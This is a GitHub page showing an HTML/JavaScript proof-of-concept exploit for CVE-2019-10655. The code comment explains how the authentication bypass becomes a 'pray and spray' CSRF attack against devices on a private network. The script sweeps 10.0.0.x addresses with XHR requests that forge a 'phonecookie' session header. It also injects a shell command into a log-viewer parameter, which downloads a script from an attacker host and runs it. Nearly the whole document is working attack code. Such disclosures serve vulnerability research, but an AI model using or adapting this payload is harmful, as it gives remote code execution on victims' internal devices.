-
Notifications
You must be signed in to change notification settings - Fork 32
/
Copy pathunauth_csrf_poc.html
19 lines (17 loc) · 1.08 KB
/
unauth_csrf_poc.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
<script>
/**
* The following PoC shows how CVE-2019-10655 can be turned into a "pray and spray" CSRF attack to target devices that are only accessible on a private network.
*
* Due to the server not enforcing that the vulnerable "phonecookie" session identifier is actually being sent in the cookie, this value can be sent via a
* XHR request using a "simple request" (https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS?fbclid=IwAR3gBKDUD4oK64oxXhGoFCYo-uhOYTRMIaW5IFsnxMEw6A4KPFNfJ7btLQ8#Simple_requests)
* and trigger the auth bypass by using one of these safe headers and not trigger a CORS pre-flight request.
*/
for (var i = 0; i < 254; i++) {
(function(i){
var oReq = new XMLHttpRequest();
oReq.open("GET", "http://10.0.0."+i+"/manager?action=getlogcat®ion=maintenance&tag=&priority=;{wget,http://attacker/x.sh,-O,/data/x.sh};chmod$IFS+x$IFS/data/x.sh;/data/x.sh;&time=1543909525160 ");
oReq.setRequestHeader("Accept","phonecookie=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\";");
oReq.send();
})(i);
}
</script>